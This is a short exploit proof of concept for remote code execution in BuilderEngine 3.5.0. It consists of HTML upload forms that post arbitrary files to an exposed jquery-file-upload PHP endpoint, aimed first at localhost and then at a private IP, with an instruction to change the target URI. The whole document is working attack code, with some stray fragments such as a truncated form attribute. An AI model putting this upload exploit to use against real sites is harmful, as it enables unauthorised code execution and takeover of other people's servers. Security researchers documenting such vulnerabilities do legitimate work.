BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" en>
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
#Change the above with the target uri
-->
<html>
<body>
<form method="post" action="http://192.168.101.190/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" en>
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>Last updated